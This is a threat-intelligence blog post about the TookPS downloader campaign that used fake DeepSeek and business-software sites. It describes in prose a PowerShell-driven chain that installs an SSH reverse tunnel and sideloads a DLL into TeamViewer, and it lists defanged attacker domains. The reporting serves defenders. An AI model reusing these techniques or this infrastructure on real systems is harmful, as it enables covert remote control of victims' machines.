Beyond DeepSeek: The Rise of TookPS Trojan

PT FPT Metrodata Indonesia (FMI) is a joint venture between FPT IS and Metrodata Electronics, focusing on providing Cybersecurity-as-a-Service—including SOC, managed security, professional services, consulting, and threat intelligence—to support Indonesia’s rapidly growing digital economy. FMI is expanding into AI and cloud GPU services to deliver innovative protection and solutions for enterprises. Learn more at https://fmisec.com.
Summary
CRIL came across a blog published by Kaspersky detailing multiple malicious campaigns exploiting DeepSeek LLM as a lure to distribute the TookPS downloader. Telemetry revealed that the malware also leveraged fake websites mimicking legitimate tools like UltraViewer, AutoCAD, and SketchUp. Further analysis identified additional malicious file names such as “Ableton.exe” and “QuickenApp.exe” indicating a broader targeting of users in business, creative, and finance sectors. Both individuals and organizations are at risk from these deceptive distribution tactics.

Technical Details
In research into attacks using DeepSeek-themed lures, researchers analyzed how the infection begins. Once the initial malware gains access to a victim’s system, it connects to a commandand-control (C2) server—hardcoded into its code—to retrieve a PowerShell script. Different samples communicate with different domains. For instance, one file connected to “bsrecov4[.]digital”, which was inactive during our investigation and received a base64-encoded PowerShell command.

When decoded, the script reveals a sequence of three PowerShell scripts that are downloaded and executed. The first script pulls an SSH server executable, its configuration file, and an RSA key from the attacker’s server. The second script retrieves connection parameters—such as server address, port, and username—and launches the SSH server, creating a secure tunnel between the infected machine and the remote server. This tunnel gives the attacker full remote access, authenticated using the downloaded RSA key.

The third script attempts to download a modified remote access tool. This altered version uses a technique called DLL sideloading, where a malicious library is placed alongside a legitimate application (in this case, TeamViewer) to hijack its behavior. This allows the attacker to covertly control the system while hiding their presence. The domain used for this part of the operation was invoicingtools[.]com.

Another backdoor was also observed on infected systems, though its exact delivery method is still unknown. It communicates with “twomg[.]xyz” for instructions. These components work together to give attackers full control over the victim’s system. We found no legitimate services at the related IP addresses, and many of the associated domains had already been flagged and blocked by our security tools suggesting the attackers had a history of malicious activity predating this campaign.
Recommendations
Download software only from official websites or trusted sources to avoid malicious versions disguised as legitimate applications.
Implement strict policies that block the installation of unauthorized software and restrict access to known malicious or pirated websites.
Conduct regular security awareness training to help users identify phishing attempts, suspicious downloads, and other common attack vectors.
Conclusion
The DeepSeek-themed attacks revealed a much larger campaign targeting both individual users and organizations. By disguising malware as popular and business-critical software, attackers were able to infect systems and establish covert access through multiple techniques. This operation highlights the attackers’ focus on stealth, persistence, and broad targeting across different sectors.





